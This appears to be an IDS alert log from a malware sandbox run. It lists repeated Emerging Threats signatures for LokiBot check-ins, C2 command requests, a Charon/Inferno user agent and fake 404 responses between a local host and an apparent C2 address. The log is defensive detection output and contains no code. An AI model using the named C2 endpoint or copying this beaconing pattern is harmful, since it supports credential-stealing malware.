2025-02-24T08:41:35.970879+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49976	104.21.48.1	80	TCP
2025-02-24T08:41:35.970879+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49976	104.21.48.1	80	TCP
2025-02-24T08:41:36.156446+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49992	104.21.48.1	80	TCP
2025-02-24T08:41:36.156446+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49992	104.21.48.1	80	TCP
2025-02-24T08:41:36.156446+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49992	104.21.48.1	80	TCP
2025-02-24T08:41:36.897407+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49992	104.21.48.1	80	TCP
2025-02-24T08:41:36.897407+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49992	104.21.48.1	80	TCP
2025-02-24T08:41:36.902910+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49992	TCP
2025-02-24T08:41:37.082916+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	49998	104.21.48.1	80	TCP
2025-02-24T08:41:37.082916+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	49998	104.21.48.1	80	TCP
2025-02-24T08:41:37.082916+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	49998	104.21.48.1	80	TCP
2025-02-24T08:41:37.718607+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	49998	104.21.48.1	80	TCP
2025-02-24T08:41:37.718607+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	49998	104.21.48.1	80	TCP
2025-02-24T08:41:37.723665+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	49998	TCP
2025-02-24T08:41:37.904806+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50004	104.21.48.1	80	TCP
2025-02-24T08:41:37.904806+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50004	104.21.48.1	80	TCP
2025-02-24T08:41:37.904806+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50004	104.21.48.1	80	TCP
2025-02-24T08:41:38.619361+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50004	104.21.48.1	80	TCP
2025-02-24T08:41:38.619361+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50004	104.21.48.1	80	TCP
2025-02-24T08:41:38.784207+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50010	104.21.48.1	80	TCP
2025-02-24T08:41:38.784207+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50010	104.21.48.1	80	TCP
2025-02-24T08:41:38.784207+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50010	104.21.48.1	80	TCP
2025-02-24T08:41:39.547633+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50010	104.21.48.1	80	TCP
2025-02-24T08:41:39.547633+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50010	104.21.48.1	80	TCP
2025-02-24T08:41:39.553206+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50010	TCP
2025-02-24T08:41:39.724001+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50019	104.21.48.1	80	TCP
2025-02-24T08:41:39.724001+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50019	104.21.48.1	80	TCP
2025-02-24T08:41:39.724001+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50019	104.21.48.1	80	TCP
2025-02-24T08:41:40.513919+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50019	104.21.48.1	80	TCP
2025-02-24T08:41:40.513919+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50019	104.21.48.1	80	TCP
2025-02-24T08:41:40.519007+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50019	TCP
2025-02-24T08:41:40.692767+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50027	104.21.48.1	80	TCP
2025-02-24T08:41:40.692767+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50027	104.21.48.1	80	TCP
2025-02-24T08:41:40.692767+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50027	104.21.48.1	80	TCP
2025-02-24T08:41:41.487519+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50027	104.21.48.1	80	TCP
2025-02-24T08:41:41.487519+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50027	104.21.48.1	80	TCP
2025-02-24T08:41:41.492779+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50027	TCP
2025-02-24T08:41:41.656178+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50033	104.21.48.1	80	TCP
2025-02-24T08:41:41.656178+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50033	104.21.48.1	80	TCP
2025-02-24T08:41:41.656178+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50033	104.21.48.1	80	TCP
2025-02-24T08:41:42.278552+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50033	104.21.48.1	80	TCP
2025-02-24T08:41:42.278552+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50033	104.21.48.1	80	TCP
2025-02-24T08:41:42.283737+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50033	TCP
2025-02-24T08:41:42.463936+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50039	104.21.48.1	80	TCP
2025-02-24T08:41:42.463936+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50039	104.21.48.1	80	TCP
2025-02-24T08:41:42.463936+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50039	104.21.48.1	80	TCP
2025-02-24T08:41:43.104212+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50039	104.21.48.1	80	TCP
2025-02-24T08:41:43.104212+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50039	104.21.48.1	80	TCP
2025-02-24T08:41:43.109223+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50039	TCP
2025-02-24T08:41:43.517139+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50047	104.21.48.1	80	TCP
2025-02-24T08:41:43.517139+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50047	104.21.48.1	80	TCP
2025-02-24T08:41:43.517139+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50047	104.21.48.1	80	TCP
2025-02-24T08:41:44.240152+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50047	104.21.48.1	80	TCP
2025-02-24T08:41:44.240152+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50047	104.21.48.1	80	TCP
2025-02-24T08:41:44.504524+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50055	104.21.48.1	80	TCP
2025-02-24T08:41:44.504524+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50055	104.21.48.1	80	TCP
2025-02-24T08:41:44.504524+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50055	104.21.48.1	80	TCP
2025-02-24T08:41:45.264304+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50055	104.21.48.1	80	TCP
2025-02-24T08:41:45.264304+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50055	104.21.48.1	80	TCP
2025-02-24T08:41:45.459662+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50061	104.21.48.1	80	TCP
2025-02-24T08:41:45.459662+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50061	104.21.48.1	80	TCP
2025-02-24T08:41:45.459662+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50061	104.21.48.1	80	TCP
2025-02-24T08:41:46.178511+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50061	104.21.48.1	80	TCP
2025-02-24T08:41:46.178511+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50061	104.21.48.1	80	TCP
2025-02-24T08:41:46.390858+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50067	104.21.48.1	80	TCP
2025-02-24T08:41:46.390858+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50067	104.21.48.1	80	TCP
2025-02-24T08:41:46.390858+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50067	104.21.48.1	80	TCP
2025-02-24T08:41:47.007432+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50067	104.21.48.1	80	TCP
2025-02-24T08:41:47.007432+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50067	104.21.48.1	80	TCP
2025-02-24T08:41:47.012578+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50067	TCP
2025-02-24T08:41:47.206897+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50074	104.21.48.1	80	TCP
2025-02-24T08:41:47.206897+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50074	104.21.48.1	80	TCP
2025-02-24T08:41:47.206897+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50074	104.21.48.1	80	TCP
2025-02-24T08:41:47.948817+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50074	104.21.48.1	80	TCP
2025-02-24T08:41:47.948817+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50074	104.21.48.1	80	TCP
2025-02-24T08:41:48.126137+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50083	104.21.48.1	80	TCP
2025-02-24T08:41:48.126137+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50083	104.21.48.1	80	TCP
2025-02-24T08:41:48.126137+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50083	104.21.48.1	80	TCP
2025-02-24T08:41:48.846181+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50083	104.21.48.1	80	TCP
2025-02-24T08:41:48.846181+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50083	104.21.48.1	80	TCP
2025-02-24T08:41:49.029933+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50089	104.21.48.1	80	TCP
2025-02-24T08:41:49.029933+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50089	104.21.48.1	80	TCP
2025-02-24T08:41:49.029933+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50089	104.21.48.1	80	TCP
2025-02-24T08:41:49.801836+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50089	104.21.48.1	80	TCP
2025-02-24T08:41:49.801836+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50089	104.21.48.1	80	TCP
2025-02-24T08:41:49.806815+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50089	TCP
2025-02-24T08:41:50.011745+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50095	104.21.48.1	80	TCP
2025-02-24T08:41:50.011745+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50095	104.21.48.1	80	TCP
2025-02-24T08:41:50.011745+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50095	104.21.48.1	80	TCP
2025-02-24T08:41:50.748237+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50095	104.21.48.1	80	TCP
2025-02-24T08:41:50.748237+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50095	104.21.48.1	80	TCP
2025-02-24T08:41:50.754115+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50095	TCP
2025-02-24T08:41:50.928050+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50101	104.21.48.1	80	TCP
2025-02-24T08:41:50.928050+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50101	104.21.48.1	80	TCP
2025-02-24T08:41:50.928050+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50101	104.21.48.1	80	TCP
2025-02-24T08:41:51.688100+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50101	104.21.48.1	80	TCP
2025-02-24T08:41:51.688100+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50101	104.21.48.1	80	TCP
2025-02-24T08:41:51.693171+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50101	TCP
2025-02-24T08:41:51.872918+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50102	104.21.48.1	80	TCP
2025-02-24T08:41:51.872918+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50102	104.21.48.1	80	TCP
2025-02-24T08:41:51.872918+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50102	104.21.48.1	80	TCP
2025-02-24T08:41:52.592576+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50102	104.21.48.1	80	TCP
2025-02-24T08:41:52.592576+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50102	104.21.48.1	80	TCP
2025-02-24T08:41:52.792423+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50103	104.21.48.1	80	TCP
2025-02-24T08:41:52.792423+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50103	104.21.48.1	80	TCP
2025-02-24T08:41:52.792423+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50103	104.21.48.1	80	TCP
2025-02-24T08:41:53.535604+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50103	104.21.48.1	80	TCP
2025-02-24T08:41:53.535604+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50103	104.21.48.1	80	TCP
2025-02-24T08:41:53.723999+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50104	104.21.48.1	80	TCP
2025-02-24T08:41:53.723999+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50104	104.21.48.1	80	TCP
2025-02-24T08:41:53.723999+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50104	104.21.48.1	80	TCP
2025-02-24T08:41:54.532759+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50104	104.21.48.1	80	TCP
2025-02-24T08:41:54.532759+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50104	104.21.48.1	80	TCP
2025-02-24T08:41:54.537851+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50104	TCP
2025-02-24T08:41:54.716435+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50105	104.21.48.1	80	TCP
2025-02-24T08:41:54.716435+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50105	104.21.48.1	80	TCP
2025-02-24T08:41:54.716435+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50105	104.21.48.1	80	TCP
2025-02-24T08:41:55.486227+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50105	104.21.48.1	80	TCP
2025-02-24T08:41:55.486227+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50105	104.21.48.1	80	TCP
2025-02-24T08:41:55.491291+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50105	TCP
2025-02-24T08:41:55.674938+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50106	104.21.48.1	80	TCP
2025-02-24T08:41:55.674938+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50106	104.21.48.1	80	TCP
2025-02-24T08:41:55.674938+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50106	104.21.48.1	80	TCP
2025-02-24T08:41:56.322837+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50106	104.21.48.1	80	TCP
2025-02-24T08:41:56.322837+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50106	104.21.48.1	80	TCP
2025-02-24T08:41:56.327930+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50106	TCP
2025-02-24T08:41:56.522266+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50107	104.21.48.1	80	TCP
2025-02-24T08:41:56.522266+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50107	104.21.48.1	80	TCP
2025-02-24T08:41:56.522266+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50107	104.21.48.1	80	TCP
2025-02-24T08:41:57.309104+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50107	104.21.48.1	80	TCP
2025-02-24T08:41:57.309104+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50107	104.21.48.1	80	TCP
2025-02-24T08:41:57.314179+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50107	TCP
2025-02-24T08:41:57.500735+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50108	104.21.48.1	80	TCP
2025-02-24T08:41:57.500735+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50108	104.21.48.1	80	TCP
2025-02-24T08:41:57.500735+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50108	104.21.48.1	80	TCP
2025-02-24T08:41:58.274736+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50108	104.21.48.1	80	TCP
2025-02-24T08:41:58.274736+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50108	104.21.48.1	80	TCP
2025-02-24T08:41:58.280053+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50108	TCP
2025-02-24T08:41:58.460867+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50109	104.21.48.1	80	TCP
2025-02-24T08:41:58.460867+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50109	104.21.48.1	80	TCP
2025-02-24T08:41:58.460867+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50109	104.21.48.1	80	TCP
2025-02-24T08:41:59.223148+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50109	104.21.48.1	80	TCP
2025-02-24T08:41:59.223148+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50109	104.21.48.1	80	TCP
2025-02-24T08:41:59.228176+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50109	TCP
2025-02-24T08:41:59.399541+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50110	104.21.48.1	80	TCP
2025-02-24T08:41:59.399541+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50110	104.21.48.1	80	TCP
2025-02-24T08:41:59.399541+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50110	104.21.48.1	80	TCP
2025-02-24T08:42:00.168521+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50110	104.21.48.1	80	TCP
2025-02-24T08:42:00.168521+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50110	104.21.48.1	80	TCP
2025-02-24T08:42:00.173626+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50110	TCP
2025-02-24T08:42:00.348044+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50111	104.21.48.1	80	TCP
2025-02-24T08:42:00.348044+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50111	104.21.48.1	80	TCP
2025-02-24T08:42:00.348044+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50111	104.21.48.1	80	TCP
2025-02-24T08:42:00.965681+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50111	104.21.48.1	80	TCP
2025-02-24T08:42:00.965681+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50111	104.21.48.1	80	TCP
2025-02-24T08:42:00.972031+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50111	TCP
2025-02-24T08:42:01.147226+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50112	104.21.48.1	80	TCP
2025-02-24T08:42:01.147226+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50112	104.21.48.1	80	TCP
2025-02-24T08:42:01.147226+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50112	104.21.48.1	80	TCP
2025-02-24T08:42:01.899517+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50112	104.21.48.1	80	TCP
2025-02-24T08:42:01.899517+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50112	104.21.48.1	80	TCP
2025-02-24T08:42:02.070942+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50113	104.21.48.1	80	TCP
2025-02-24T08:42:02.070942+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50113	104.21.48.1	80	TCP
2025-02-24T08:42:02.070942+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50113	104.21.48.1	80	TCP
2025-02-24T08:42:02.703391+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50113	104.21.48.1	80	TCP
2025-02-24T08:42:02.703391+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50113	104.21.48.1	80	TCP
2025-02-24T08:42:02.708393+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50113	TCP
2025-02-24T08:42:02.918392+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50114	104.21.48.1	80	TCP
2025-02-24T08:42:02.918392+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50114	104.21.48.1	80	TCP
2025-02-24T08:42:02.918392+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50114	104.21.48.1	80	TCP
2025-02-24T08:42:03.709674+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50114	104.21.48.1	80	TCP
2025-02-24T08:42:03.709674+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50114	104.21.48.1	80	TCP
2025-02-24T08:42:03.714734+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50114	TCP
2025-02-24T08:42:03.899121+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50115	104.21.48.1	80	TCP
2025-02-24T08:42:03.899121+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50115	104.21.48.1	80	TCP
2025-02-24T08:42:03.899121+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50115	104.21.48.1	80	TCP
2025-02-24T08:42:04.678316+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50115	104.21.48.1	80	TCP
2025-02-24T08:42:04.678316+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50115	104.21.48.1	80	TCP
2025-02-24T08:42:04.683338+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50115	TCP
2025-02-24T08:42:04.860065+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50116	104.21.48.1	80	TCP
2025-02-24T08:42:04.860065+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50116	104.21.48.1	80	TCP
2025-02-24T08:42:04.860065+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50116	104.21.48.1	80	TCP
2025-02-24T08:42:05.629714+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50116	104.21.48.1	80	TCP
2025-02-24T08:42:05.629714+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50116	104.21.48.1	80	TCP
2025-02-24T08:42:05.636445+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50116	TCP
2025-02-24T08:42:05.803640+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50117	104.21.48.1	80	TCP
2025-02-24T08:42:05.803640+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50117	104.21.48.1	80	TCP
2025-02-24T08:42:05.803640+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50117	104.21.48.1	80	TCP
2025-02-24T08:42:06.577278+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50117	104.21.48.1	80	TCP
2025-02-24T08:42:06.577278+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50117	104.21.48.1	80	TCP
2025-02-24T08:42:06.751125+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50118	104.21.48.1	80	TCP
2025-02-24T08:42:06.751125+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50118	104.21.48.1	80	TCP
2025-02-24T08:42:06.751125+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50118	104.21.48.1	80	TCP
2025-02-24T08:42:07.386260+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50118	104.21.48.1	80	TCP
2025-02-24T08:42:07.386260+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50118	104.21.48.1	80	TCP
2025-02-24T08:42:07.391276+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50118	TCP
2025-02-24T08:42:07.557952+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50119	104.21.48.1	80	TCP
2025-02-24T08:42:07.557952+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.4	50119	104.21.48.1	80	TCP
2025-02-24T08:42:07.557952+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.4	50119	104.21.48.1	80	TCP
2025-02-24T08:42:08.184382+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.4	50119	104.21.48.1	80	TCP
2025-02-24T08:42:08.184382+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.4	50119	104.21.48.1	80	TCP
2025-02-24T08:42:08.189451+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	104.21.48.1	80	192.168.2.4	50119	TCP
2025-02-24T08:42:08.365524+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.4	50120	104.21.48.1	80	TCP
